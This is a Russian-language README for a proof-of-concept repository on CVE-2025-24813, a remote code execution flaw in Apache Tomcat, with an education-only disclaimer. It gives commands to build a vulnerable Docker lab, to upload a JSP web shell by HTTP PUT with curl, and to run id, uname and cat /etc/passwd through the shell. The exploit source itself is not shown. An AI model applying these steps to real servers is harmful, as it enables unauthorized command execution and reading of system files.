
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Эксплойт и PoC
Этот репозиторий содержит полное доказательство концепции (PoC) для CVE-2025-24813 — уязвимости удаленного выполнения кода (RCE) в Apache Tomcat с использованием метода HTTP PUT для развертывания вредоносного JSP веб-шелла.
🔥 Этот эксплойт демонстрирует, как злоумышленник может добиться RCE через загрузку файла и выполнение полезной нагрузки в неправильно настроенных экземплярах Tomcat.
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml или конфигурации сервераЭтот проект предназначен только для образовательных и исследовательских целей. Несанкционированное тестирование, эксплуатация или использование на системах, которые вам не принадлежат или на которые у вас нет разрешения, является незаконным и неэтичным.
Shivshant Patil
Сертифицированный этичный хакер (CEH v13)
Выпускник бакалавриата по компьютерной инженерии
🔗 LinkedIn
🔗 GitHub